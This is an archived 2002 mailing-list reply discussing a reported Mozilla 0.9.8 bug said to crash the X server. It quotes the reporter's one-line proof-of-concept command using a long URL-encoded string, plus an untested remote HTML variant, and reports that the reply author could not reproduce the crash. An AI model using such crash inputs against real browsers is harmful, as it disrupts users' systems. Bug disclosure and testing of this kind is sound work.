On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote:
> NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't
> make it since this doesn't seem to affect a redhat itself, it affects
> the mozilla packages distrbuted by Ximian:
>
> The test system look like:
>
> bash#~ rpm -qa | grep mozilla
> mozilla-0.9.8-1.ximian.2
> mozilla-mail-0.9.8-1.ximian.2
> mozilla-xmlterm-0.9.8-1.ximian.2
> mozilla-devel-0.9.8-1.ximian.2
> nautilus-mozilla-1.0.6-ximian.4
> mozilla-psm-0.9.8-1.ximian.2
> kdebindings-kmozilla-2.1.1-1
>
> This was tested in both RH7.1 and 7.2 with Ximian Gnome.(with all the
> the updates).
>
>
> There is a bug in mozilla 0.9.8-1 which allows you
> to Crash the X server.
>
> I won't go into details I'll just show the proof
> of concept.
>
>
> exploit:
>
> Local:
> bash#~ mozilla `perl -e "print '%20' x 2618"`
>
>
> Remote:
> I haven't test this but i guess:
>
> echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
> ./attack.html
>
> perhaps using "img src" or java script...
>
>
> Best Regards
>
> --
> /*
> Rodrigo Gutierrez <rodrigotrustix.com>
> Trustix AS http://www.trustix.com
> */
>
One one box: rpm -qa | grep mozilla
mozilla-chat-0.9.7-1
mozilla-mail-0.9.7-1
nautilus-mozilla-1.0.6-ximian.6
mozilla-0.9.7-1
mozilla-devel-0.9.7-1
mozilla-js-debugger-0.9.7-1
mozilla-psm-0.9.7-1
mozilla-dom-inspector-0.9.7-1

Results in "www.perl -e "print %20 x 2618".com could not be found (lol)
perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't
overflow perl.

On other box: rpm -qa | grep mozilla
nautilus-mozilla-1.0.6-ximian.6
mozilla-psm-0.9.8-2
mozilla-0.9.8-2
mozilla-devel-0.9.8-2

Results in same 'not found' error.

The attack.html (as per your script) results in "www.'perl not found".
So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in
0.9.8-2.

-- 
NyQuist | Matthew Hall -- NyQuist at ntlworld dot com 
Sig: Microsoft sells you Windows. Linux gives you the whole house.

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]